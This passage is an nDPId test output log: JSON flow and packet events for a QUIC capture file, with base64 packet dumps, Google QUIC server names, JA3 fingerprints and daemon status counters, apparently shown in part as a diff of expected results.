Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients2.googleusercontent.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1621490940362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490940362,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEyFAAH4Roo00uxSvedF+ofgTAbsFTnxFzf8AAB0IX1A3NmSMbKUAAEU0xxudDjtwfHlFBOkIITOn8rvZxFm\/C93HCINJPVtiKR6bg4Mw7wQEXtiGHvHKsHQBCttPbgS\/hcDSxPOzux0V4CNQepSq2ytOhstQPNFgKqDi1D66h\/pG7BpGzCKPVnSY0j4mZfGHvp\/\/90uSi9bw7p+VzILVU3jM1Bfy+bJs20rNuK7sUwNxouBiolA43ulRiKtOrcMFSJUwryaJPuIF2AKADyLpYU6k7IhYp5pMSN\/FZrzaNP++MuPxUL0Gl5Navc20GBsGENjWTKPgIBn9sYhebGFEzStHKW0oRdWu4ecBWDSRteLnjvyRNfq+mu5PY+bv2BFXCrGw35UfLh\/YXxBUAy4mIdjLfzCt9VY3jAczlR6NzkXFtYCr4R8X++5lLCWyho9eGTf\/ZCpvdhXIm3YwXRQvz+kfxqnQsXH0ATnpdvEsAGru0CyioUbYBPhrlPL198KH2whWhbXpqJHFAyYFbpGDtS75d+ky3I7XtWANXuJ7DarmS3NZjP4Jf66vvGqKiJgy0KfGW+e7woGpFYzAoh4imK1VH8lIlaAurjJK0bKeBg9p5lFL0\/l+10ncgvPXDUuHlo46gy\/05jQ7pY9sWVusH8IwAbUs7+8XHTFa2n0Sk2BBs7cZpvTnwshZ+DP3ur5kokHk4A+vp7WHa4BbCLu22NtXJTp\/gQCajhA7U5McVzIVwwCkYzni+CTklGJudESK0dNwGzMjjvyh74BS8FP9wJoxjQxNp+QpBlr56o5vBkDintusd350CRIWzdRHfSgPIvr94nWDpXZFHV\/kTCtKuqDDbRIFJXgtJbMsMFk99XMXvWAVlDdMLwUFBCiheR0jEKmnOUGFAhtpeRaDYUitm6kQwBSlx494dMG4z7plhkyjgTRLdgMjGfgIdWdBxvKHIIvG3w\/V0evuN7rNPmv9HuOEitJrzJxpVhNZOoxAwLj9Luz46NCnQhKxi8RkJzyxHrjJop3lPAM0Y0bEhkOzTIRWf+t2hC8aA4KzaeLaWoCMRho1h3u3XPu3\/l6coc7iHJv\/2jzHV2f+8iGD+OQNMR9Kk99olUGh3yP6NJUA\/\/JOUUSZU3oe\/+nZqHPjXlf6UZ981hgrw2hFoCczDQltVQw8FOKd26NbN1UtWgiNS2G8T40NYIim1zBCFfKP9QB7fmPzHJDrqF9B2z8JCy2E76upD5NGPW077sVIvba7Ipr6QIRTGvvbV1\/tkhYCjTPxCUUENkB4qeC3g47G4DoEvoxNPUmX4lTntBxzxCUTgRTwb\/lKdC+a0EYxdtM5lRPHqXOg2W4+zkbzAvD981aa8cd3CUfbaiE3dmvVl8kAJBTvA7OBTRbFUiyh4hawpJaNoqqurTOZisggyEq8HET4+QxdAtFezeONkxyuzFSApfMDq9flcgmEnkCr0TO0tqKJC1OKWpkWpLnBiM8yAGqKTKylOg54gnFHgxTuPO66xLEKA8U9uUArvEv53MiMkmwlGJ\/R8DVYSi9lDGyVmqVbcb97csNgpSyaEAeipp\/xWQ9HZtumpN8oEgvCYnLsS2EfcfhO913KD0CEGNt5Eo4gSfP81+PQSvJvVrMAn8EG7DLqd7Bmv5BkyGG2JK8jhFljvgxwM6xjiPRsTShXGKbUG8XLhVXExbTQLftOfAo1ewb7oxiEPU8I+f46C5Ac4FzkNqV4H\/gd0P38BHG7LPoUUiE\/Ipgayi0qMMiXrV6TBl+UJmFlsYoY5\/mLRewMoSEzw4RRXooYehfNFw04DLhOfVWgmuS8w2oNaA6WV0z9"} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1621490941568,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490941568,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEyJAAH4Roow0uxSvedF+ofgTAbsFTkMYwP8AAB0IX1A3NmSMbKUAAEU0X3GLCKhQ\/kdXKlH1Uuvr7DsXc9kc2k0vey+LpKewCV3nDMgYTsbLcy\/hcOGbXOScP++l31aUJmaaSW7D3\/b1UKqaibOt1++jBKUGgHxvkHK7\/eIbPnk5lrlJGltbH1lVtjul90tjvoP2C0HGMu\/Q554\/zF5y3+m7JmZAmSjKD68m0IKoWfIlmy5OvxUjvqVj7fVNTGy8V9A8hysK+PthsdG2XbAGQ5r7jFZtgM2W0MUKS7M8fkDlpw6kLICW6or165\/Pu6sFJ\/29IWOcJLgCsF33hp\/eqp6x6\/ECLl+bLOD\/2ybV1zgfWcQJdeCTDlaBbs00YQsEWV3eNTSP1cAPrcHphduw9dFEMzdLujKMYP6qp9q4Kf9aga2dK4puh5Ip7GziQj98etOy\/ltXPqQDK0X0xvEFsMV40JSwj+BzoIGv4jugTdJl63HCP9wqVdO7OrAmKEFYkbeXK5P6pG8yzHXXppocSBsWVO97R55m5tJhwqTeKsPTGfmgkv+0mr+yMvQABbK3kL73O0HwPVgRMzkj11Hwldi1m3kxEtoBJnbHsAJyW4T4WEMuyY9xWOFILOzlsEWcW1DlkhujMuBrKf4HHbPFIfZA+vCGqVGuA9J49rsNTvkxJ3jjtUuvX02pDhaSBY2OTXYv5Dc54DTTkDjg2S7sEfptoW0pUxSNkWGCbPIP4xa+v0s6S\/mMMDwXP8kgPvEmHUDknP7JkED8bkUIL1Ho0AWHqdjSnc7aUc0tHV706qMXs0VyhEhojglXbeJLnekqAVF1dAyJGsOPr5QTKqiKuC+Sgj3UNOQ2AORLL3k0ntqV2x\/rHRdWLiJtPYEUBcvzUxECD7Dtnifc2AbiFM\/4baOlJluyckkIkfljDBVEu84m1Q2kmQPBLAgkcl7yWChrQ5E\/F60If6SMyqrUlc2HMVvUBPZOd0Nsx8em3OcZz\/rd4dy5sR9B9SAkyfXIjPZat\/3SaduQsvQmjAvUkWJFmJcvwpcq2CHg3vveXbVE0PWJwxm31KUkGpdZBf0LnhThU3dnOeKxoMeUP496G60PKVdq7+Ev8OZxM4csxN6N9XOao2AmHwp\/0PfV0b+M6mCVlON4ySjH0zfT5CuS19JLsB0PAKCSWv6u5RSSSFK4\/9Pykim8KK8CSmoO+ZYYUWS5WpEmMsvK64DpcO9Wo88i\/G337OpXfoBIGbBcKqVJnkKYXTEBvx\/pOckc6mKqj1Xx2NLH9flt3AVKGz33q9V7vvj+2mpU\/AF2AYOC5QHoVhyHo4\/LUMEXlMibQL7QWDMM7oSFG9qo4z3Ogx0Id6yuIs2TTa0ezZqML11NC1X5955fIUW\/FDJcjZV8HB175+M7QL6IEWOOx6PZp1K\/RJlnO3heZacJYqauQwksZQsk4arIv6tCsj5ldWRpoqj3CLHPSNLlUOifs4ET+tW4OnRsMipebDJLpPBCJQJ+ecUpHtHbH+75\/d\/mWMiDQ\/hwUplHzhAjVMYLJSbAhbvEaR1IT2meCVIPAWn6ZyjG6gExtCbx+iUePUXL2hlrgzvBZ3GRHAOacsg6dN+CWQxwhWJB23q+MgzegfFEv2iEzXU8DkMvw\/RCwWjBr20X1FCOk795+lTgR3zGd9CF5postNEBPhGGGNxdqFYsot1FrVpwc5OqokbxkxTF7Onnq2kbbsl8Ba3XWkoGN76uWqzAZmzJNMK92Tdqpu1zazult+08ooXIuTRa2BfjyhJzhXLCrMQgn4QLV75o\/ppwW4gZ0PFwpLXpwmShzQ7nN6WnZ1Py"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621489064431,"flow_last_seen":1621489066532,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490941568,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621489064431,"flow_last_seen":1621489066532,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490941568,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1621490996100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490996100,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEIJAAH4Rpj00uxSvbKuKtt7qAbsFTlULzP8AAB0I1Car3PgqXoAAAEU0JJ9ZSJFnukw1kpIlerEIR7j54itrs6xKCGRE3XXR1FUvYtWiluVKkauej0mCgbfT49PWNVhv+d4PorlbwaCUuVogcoTaWUYfSMeQ7fvaCU5aGPhJnEWG\/0UBi1+8bCzq+SnypfTFmorq2dCk0qu92Ra50orfefmV0vtWsPEJimLpBfooWqbaEDaehfit7mw9dCNYCi1aruacDnpniKy5C0xID610oz+9TzXqtP6hBX3weUiK8Pyj6SMCZYEMLlvyFqwJB6JhFabZjNVmEjxtmGfFjrlmd8rGHWmhPpNKZDxUqmt5inD\/KBSwcSZjjZ2qVnYKFg9ZmE7YiJQNgNHdWnN0hvXaAF9t6UZJG6j5RLXjrewkAvkQDQHDpjvn0e4OB74XmU0f2pIRunZhG7nOdLrUIM3KYu4dp2SuvtBfXKF0JXJe4B3ipp\/HIXGxiIvxOuBhCV+try+l4\/ghPvYz4guxmwVL2sb1KOMYvw3AS2A9R7ISPdwCMEfNl0w7rnx7vKocBLncvhtDj6UswuytUe86VosZs6KpSu0MAgLJQtzS5mHMtRoQC8nFUX3y9GJ3tQdZReoRs5tT1J5QMG4ZaagK3Fd\/7M9x+E3FYrzzeGcDRtrRq5MMA4gADKTgaYZ+dKZMGdYo\/zPs253wfmTLUONNUPE7nq2Vqk53VySGDE\/2DUFu7Ouj4RcxQsyWQ5nTu01SZpQVMCdEN9s3guPRJHE1wvBDlg3bcsULX6ndUJQtoKpB8S6SxF27c5F4vK6k7cDGBUHNhgFGBvHbDK3DfXDpjwj7gg2cqNGRjyAQuR9PRICL7cb0AtSLaZUVEEj9LOfinX22qJNw3UF45DmfYo0\/JhJsSVJETL+9+\/IioFEWfh7SIpMVOu2RmSgEttov5swxPhIzuPvG+jIN04ml6r6sKlbwvgpbTGRWXVEqHBIQKz6hKZClZuSzSFKbsX49qdGXDM4XoODhPHLuRT3yh5r1JVnj7WHxhj3H5nD905qtU6bFJNe7n8l+D+uTJC\/IJu+kVyPQUWTIszeHcVgbabOXCOhKEJ2WtzLg7w+iaHi5LKjOT0MhRn4SMjHqY8gT6IdQh2dB8UwKaPz4N4HHltvk\/z2Y4L7mxeZ\/JjfG7JTmXTK6vTdjv9\/CAxmGhA\/wluaZ8tsrr5D+RdZPcXbEgBxH\/1tm6Bm6MpwP4YTSV9nxhIj0pGZHkpR+b2F4vl+nfENUZ5pReO94D4F\/RK66IESDjrP6tunmsMOMwn4+7B6QDDyOPDemTPrdF7zgJ+tY8975Y574Jc\/8yLBjbsC2ChrCxey35qrU\/vbhI34DkY7t8RrGmb3mWvKTS3qkB7Crk6DhnsUeTkGhVfg7A64U7ZiG4gBUQe7bIdSST2ngB6BSxxi3zRFk57obYhZOPoc3fWCo75KIToMVPMEYkIJx9+0YQlJeC5tnUyTEdxLueb2t5tk60+o+zEAOczUzzmu+JgJmBDQC3kS7OhExq2w8nBzzBuSHPPKcrZD8XdVFyl6v9hzq+F47wNZ22K27SHatestnBzU2FJkFSWgVWESWEb2tfRRceR37vbK\/bpqkp0cvwGojwVUlRemGqfylFPMQ1s+cnHj5sWbpZptO22YP\/G+CKfzf8pXSX7kzLdflxLF9DxVV+b83+nl+nTbj31vNDvGjXGswE6k3b\/905Liv2TlF0IzK2ZLVImonTHT6GswLKKIQ31p0M617FD3z1I3\/Kv2TR3RJaw4Ynkj4A5OuDN07n7PbCwGTm8j44Q\/2rqIeqilV"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1621490996403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490996403,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEJlAAH4RpiY0uxSvbKuKtt7qAbsFTmC3xf8AAB0I1Car3PgqXoAAAEU0S6ZfGd14S8A0NR1EXdOvvljTofNOsuBTESXKp4Oj7auLmC8B\/qxGB6ytk1wgcKgb4d567f76YrqqUml1MYVDe1C\/JvoI59\/gIk5MbkrAeINiJJmd4QeAnkVSzV5lCfOcg4X92GhM4oNiOV2dGGG19wmPo1+VUjHzShTUdyDHnnuZMliAzOjvbmXBN2aOzeCn+8K5drqRExq0cBsCHzvVRFUNzNlUUX5Vo+D387IvPpUHb7zmraw5XeiFvxl2Ta\/q5W5pNrCUAugz0iVIVuWVUNPV2x3FJywavW9Mc5JIWO8xXdlge6Szt9ygE3gMdi8fwLQb8lGW8vEcTE+N\/RkpReCzQ5xMfv355m1dCwCDmEbVqFEy+tHwxDIPuNe27WWgF9XSiasGS+4dfQwcg4ORYoMDpbfXKW92OUlTCH6yDwc7C78NrMUmisC5VK1mGGLaQ9Qu2wMRUqjdmNuepip5K0XNHR5BBbH81tXrZgvI7+1m6Yw0b4kZRl80WJwqq1KSBW4yOioR69+m2UjFAyV\/DXvz\/cExixYmUmVoRdQkJvqPEwdqKmYp83pX9N6Hd9bp8FjZiscO\/ylBmHeN2rawxJLrCx1pzuNkPlwJSuJasPINYSbw1F6JY3wUwxIeNBUcmrCmJuSJtdG7ayJElCjqeWPX8iOrtpJRyvIeNvVeP4zvOG+0xtaofbgfCwz76b84GmN17Mieoa5Bg0V+IoGD7eigcx4YglpTvHcQafiVJ+PIKzt1Fb+zraYPSsDdrlZP1w+1Hf31E\/7kXH56u8ayLXgMPnrISXGFMyS\/xokT7eAZHt\/LAzOJxdLaTDPem\/QunlwKxGvr7bmetIM3A6DNVEQjlmxo+VRIkbPBHlH8femG9JcYcQo9D76bkS1ct6T\/NMC38EOKjtDrrbwB6KP891J44T0TieukIbMdjtFWBM7IOVr8jksgPE25Qg1RWYJaofEPkp4D3UDLFQ3i3dbANJ4XVY\/+L6s+MFkMJ5vBF3bZcm\/tDpVfLrqBJT4nJ7a1C2yAYs59uuvaHev2cKOStPDQDjZlKsuGChOYfuICTD4igM9\/JcrG2yRYeOUCgKTyd394CO7u7YTQ5SxBzyztPmR1KbXNMGGetSQjaw1hK5VOfjJgPn+mSvHfGKivShlE7PanYf+wRwpAG4+iHQtJsjM6WclCAcVrZNfSob\/SYkmMNb3abOPObEQM2ceixo+VTcnp7HeKPVYD1ybdnOMOXFC1AEz9wSofo6gTNdJjdRzlc\/9v7H9A4GsQFk2F7K54C2kPehQpa66BiqetQtr+UE\/dVFH6uNeScw+ulCv\/wbm+OBfrLZ2GXKql6eSDpcCVpn3MV2YEi5CgRFRyayz\/\/2woQgL8t+RxToNJ\/qQWCsxJMrThy97Ju4LAwWk5KeZaLwnxjsnunA1T99DyV8+UKz7+g5JIOC8ruYl8Cwc3nxBc+tvBSpA4ZcE9I+tZo34gvOtIq2Vp5LtGbyHij4LH40qk6nQ\/1gDcnTZVMAXlo9nJiRobqRR+5H3Sg6cc623xK2b9CkBfTTs2kJf1fvbYMbdZ+wEDmMqWAzs4QGCGgJ6e4avqUcQ0kS0cOgHx6IAe77IaK1bK2SrJc66FdwbVpj+\/3eUCOHhaAIGMeISGD7TNa3JfY6n0SkFubtUhSB0GUsv2j85xhlI1qeV+8UDynYcpwz8FIiKVdUIjfXcOGHLc9FJMKZ3XshDKwmNniXL0xT6RHfFQH3w8eQ\/YxCjcIE1MW2OGZs+3vB9wyULm8eiLTszw"} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1621490997006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490997006,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEJ5AAH4RpiE0uxSvbKuKtt7qAbsFTpBcyf8AAB0I1Car3PgqXoAAAEU0uA5YSqiRZv5\/DZhOTssoA0DPn9Zo4RXJotK44fYCvFiyrLXWkACavb445uJAej9D6NW8Y41y6KLu3pIKWD5qGNryyrX7YHITgUXix8iJo5DiSxsH3mGC2JahEYGf\/vTyPVMCyJZWsgerAn4HVFWRUh1qe82mrvrOfq6CMJqoDiP8vlj8+LrUV\/YTZtmYn9QGfS5vgZWX2txmg7RWFMQ+Rz2t3\/jIoTk1tBYJ8e4ItX4pZIW\/53Hyo2dcr4a7USRmF1tn8rKRC5HhXyRfxIBsmcteyC06JLk45KaIFQsqsO01ArTRBrqtXELj7tUE98y6lWlRh8r4yikeZefWhfGlnFB8GF6ugo6zdES7YXjYS9WA652moLPIYC0HZ4SbnVpSbRSuHeIGE5Lu9G6Sue9cSsIYF+Q+QkYSmgthm63nN\/pLWKoU\/RnLDJHaaN+LMsKEUL21PxpA47xYiNZr99R5HeRxIrMGueLrYGdwS\/9Macb\/Jur9jEdINRcxOqvE\/Oky1YBxT9EEdmvl8xfSzGRV6EJ2dO8C3TxvmALVJdJg7\/+XmVlc7vdVkE++7sw3O91FGcYlrdAT8TCgEm4OjsLPi5Cp+NhDUd9lNsblGNPne2oWas4b8C2P\/tYyZf+gOvHLJV3qKtY1q\/qcAcDlCTflHkKqb\/f8vTpeSKwdug8\/WMPk7J7GuRqkfSiRUAHrQP9z8Ev0mxBjmR0hdyQhsJrq6NDbkZA40SjV4PLS6wDFjRKFILwhocOA59yklQQ9oYMwuJzmXLKwLrh5mOeO7SiIFPGV64mweKEGNBwsPL73yemcdr\/l7ci\/aRkjgroHfTOlRVNlwd2SMp6acpgJ3DUTPihyMBDSlBSCN3TpbTHi0mhLZV3VnRkGCjGLPs2dQwR+\/NHoWbG\/mkxOp1+Yw2+oGEApO7eTCrPIrMzOJPwIOKL240s+7ngQuSxGGK0TJiP\/b3U0+u65ktYKEIhmHd4NjqdknH73Qe9XAd2ZIJ7fI1HZmpgWCSTOYqlCtKfFnEWXjld7ZMR2bys1tpSPgypDIWux8kmWABvn28paMZ5649uFQ9tMCjlecEV\/1g+ERbp+wKDLmdogOcIzxg0M+JAJaffVX3DrOnA+A+uSiEkyKncq2c\/YTqK9cI\/JDh0JxfqNhsxmMlnwuAaJuPcBh1lD\/B3Q54dORDqCAw\/xIL5UovaES4PJSfmtHs56ItrSO911ZuIm9uOZr63ZoEcTfsynRQRr4UugAwprRYIoFK07lwdRcDiV67g2XdWXRwtNjWXsWfQGHKiNcbvetslRKrXfxyaa5qn6SEG2C2SnYaRGY3a99\/8awO5F2Qpe+vbycKzEN3ueNUgtD8y92W1XtG2C78GhMCEI1RPYj1pzZhzbrlJRrm5YT3D\/l8R+fQYCAtmrdD+CkceZwNpPKhEhVavI5Gp5XwNdJ56+RbVOrxDRVmjqTRPLg4zuWj2jEJ79chsV5GX2UrMGDWSjjSZAsWp9Mx4ndt6VUOFZip\/9r4MKmJiO7yGxG8d3B8CM0gf2O3UIBZEchmXjqS2T2\/ewwSSDqYn23knX\/nt\/rnNzky3YHLXA2PXQsFtsr2gSewQ8lu4K9Abfu98oJmGOqB6Zepl6y2WwgW1oaL73FaoUE77CPUfZc3ThUmYcus+PH3momVuo6wjeidlhQHQcAxWy2EczheDpK4PInZZTQH8B9cl87zWeaY26xiBO6\/KO4jcBhP55bEZTsGd\/GDBTnrzlfHI8ia0xyN1XOyklzBDoPTS\/1FjAcpdn"} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":103,"packets-processed":102,"total-skipped-flows":0,"total-l4-payload-len":137700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":69,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":69,"total-idle-flows":66,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":312,"global_ts_msec":1621492846202} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1621492846202,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621492846202,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYMxAAH4RSx80uxSvxPU9QM0gAbsFTsrvwv8AAB0IkN0D0fi2gP0AAEU0WPLbpHtkRhjnBwYFLsQ0oBVcuOZxPwKAEGEgwAlTMTXTGM71v6BXkNyXBiiValVwFjUYX7UUrk+V5Jrupcy7Obpi2i00t8odJApt+XitfLuiix1t0F7z5Z+feBpcusmj2sOZ6QR6h9W++LWKulARwr2neypk4oGapBa+NsiNweTRdbMX3O4d\/mwfllanHZjdO6qyaQ7CnGSuCulGekhpihqBGXPcLW0di3I9pvTqznFG9kWmS8ORGWf1J8GUtGc5VJSaNCJ+Fec43BTOm1+MS\/j4zGK08zpEpGVcAuP60NQcXU9UkzZKsPw3ZWurcWQhQRUUG2hZnMieZ2iH9C8vVNFBjN\/04FbVKM4mZrWJT1lug\/jBAePvCTNRYXmLxN9Ou++HC02AMJ57sWcEhMIYguKuFYuR7dxPfL+cTW1koRSS6BsFC4n5ZRuwmsUcF9vfJPEIqvBwmCjtVhhf7VD5goH9tVyYF8KO3kIv28uMuxWcK+q6wT8hSJ\/zEHzootumo7aXQqZvFeJhyCX0EfLhJ23vbRO9FmugxWN7m4sTU7Fhf9kalJr+3D134oZ9EEYm2k3laLxJs0+YOmna+6\/rVscNjjUad0DFGPUlfBEWehyhkygQSnAC64dHYrDv0iBrOmlJ6MRSwFxUrKXnUfq3k6Sjz27UeFDKAbXjm9pfn3JaqYN+iEPqCI6LxBiewwQo6PhkrbmioOgwvX\/DmpJRnPyUe5tKPfpj591HlcbD1wj8IAwgpQiAbJmWGX26TQVGc\/oGu0wUuxxgG3S0COr+VKnO615jbylfYmabj0+tV2Uo1TdMmuzr4pfQWFOvIgEzWzlgauVuFGrxVJNotNQk7htoqJBX\/hMnFoa6P3D+kOnEu3G17VXOpjoxBo+e82xbyKTxE+HiEnZeWZL7luz5bZBmWGZc506mXLnCeZZQqiG\/9I\/FNIpPvoo3H6warZwrzbb8Um6Nvs0Ics90RO0bApWCzRG1ZbX3AHjvDgTh2p8CR9Oooi6r0cJxgwFZZY8SZy3zNyWg\/wHtBtGqhZKlBnnzNUo9ZvpjYGNFYCmpHvrwviyxBvhHkg983940o+FsWBHY4PXxHhH1BeANrMFfkbINkn+CbC2\/r3ppTRHHY4fjTIWqDjaau3fmNxn2oa4KoWNkTjA1BSXwvqc8trFGDFMCJhUs3hSHPiEoAQ531rkzeUr7wtvjAhy3yMpxtEUaaAGyPySo1NYyTXEWK8w0\/YLlmeDmev2JWcCnl7HS0O13jStUjDzYdEKkWbQEZyNX